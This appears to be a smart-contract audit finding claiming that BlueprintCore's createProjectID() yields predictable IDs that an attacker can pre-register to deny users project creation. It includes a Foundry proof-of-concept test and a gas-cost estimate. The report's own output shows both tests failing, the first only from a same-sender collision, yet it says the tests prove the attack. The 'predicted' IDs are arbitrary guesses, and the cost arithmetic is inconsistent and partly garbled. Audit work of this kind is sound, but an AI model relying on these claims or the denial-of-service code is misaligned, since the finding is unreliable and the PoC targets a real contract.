Sleepy Taupe Crocodile

Medium

# Project ID can be easily determined and can temporarily DOS users who want to create legitimate projects

## Summary
In BlueprintCore.sol, createProjectID() function will generate a unique project ID based on block timestamp, msg.sender and block.chainid. It is easily guessed - if a user has created a legitimate project once, malicious users can conduct a temporary DOS with ease.

## POC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console2} from "forge-std/Test.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";

contract BlueprintCoreDOSTest is Test {
    BlueprintCore public blueprint;
    
    function setUp() public {
        blueprint = new BlueprintCore();
    }

    function test_PredictAndBlockProjectIds() public {
        // First, let's see how createProjectID generates IDs
        address victim = address(0xB0B);
        
        vm.prank(victim);
        bytes32 legitimateId = blueprint.createProjectID();
        console2.log("Legitimate Project ID generated:");
        console2.logBytes32(legitimateId);

        // Analyze the ID generation pattern
        vm.prank(victim);
        bytes32 legitimateId2 = blueprint.createProjectID();
        console2.log("Second Legitimate Project ID:");
        console2.logBytes32(legitimateId2);

        // Try to understand the pattern and predict next IDs
        console2.log("Attempting to predict next IDs...");
    }

    function test_DOSVictimProjectCreation() public {
        address attacker = address(0xBAD);
        address victim = address(0xB0B);

        // First, let victim create a project to see the pattern
        vm.prank(victim);
        bytes32 victimId = blueprint.createProjectID();
        console2.log("Victim's first project ID:");
        console2.logBytes32(victimId);

        // Attacker tries to block potential future IDs
        vm.startPrank(attacker);
        
        // Try variations of the victim's ID
        bytes32[] memory potentialIds = new bytes32[](5);
        potentialIds[0] = bytes32(uint256(victimId)); // Exact same (should fail)
        potentialIds[1] = bytes32(uint256(victimId) + 1); // Next number
        potentialIds[2] = bytes32(uint256(victimId) - 1); // Previous number
        potentialIds[3] = bytes32(keccak256(abi.encodePacked(victim, block.number))); // Similar hash pattern
        potentialIds[4] = bytes32(keccak256(abi.encodePacked(victim, block.number + 1))); // Next block hash pattern

        for(uint i = 0; i < potentialIds.length; i++) {
            try blueprint.createProjectIDAndProposalRequest(
                potentialIds[i],
                "blocked",
                "attacker.com"
            ) {
                console2.log("Attacker blocked ID:");
                console2.logBytes32(potentialIds[i]);
            } catch {
                console2.log("Failed to block ID:");
                console2.logBytes32(potentialIds[i]);
            }
        }
        vm.stopPrank();

        // Now victim tries to create another project
        vm.prank(victim);
        bytes32 victimId2 = blueprint.createProjectID();
        console2.log("Victim's second project ID (if successful):");
        console2.logBytes32(victimId2);
    }}
```

## Steps to Run POC
1. Copy the above code into a file named `BlueprintyCoreDOSTest.t.sol`. Add it in `2025-03-crestal-network/crestal-omni-contracts/test`.
2. run `forge test --match-contract BlueprintCoreDOSTest -vvv`
3. This is the output: 
```solidity
Failing tests:
Encountered 2 failing tests in test/BlueprintCoreDOStest.t.sol:BlueprintCoreDOSTest
[FAIL. Reason: revert: projectId already exists] test_DOSVictimProjectCreation() (gas: 373449)
[FAIL. Reason: revert: projectId already exists] test_PredictAndBlockProjectIds() (gas: 66399)
```
4. The tests prove that it is easy to predict and block project ID creation. 

## Impact
As this will be on Base, gas fees will be much cheaper to conduct this attack. Even when mempool is private, it is very doable to conduct this attack as long as victim has created 1 legitimate project.

From running these functions, they consume the below amount of gas:
BlueprintCore::createProjectIDAndProposalRequest --> 123166 gas // ~123k gas
BlueprintCore::createProjectIDAndProposalRequest --> 57266 gas // ~57k gas for subsequent calls

Assume current base gas price = 0.13gwei
- Cost per malicious ID = 123,166 0.13 gwei = ~0.000016 ETH
- Cost per ID = (90,000 * 0.13 * 10^-9) * $1,900
            = 0.0000117 * $1,900
            = $0.02223 per ID
- Budget = $100
Total IDs possible = $100 / $0.02223
                   = ~4,498 IDs blocked

## LOC
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L255-L281



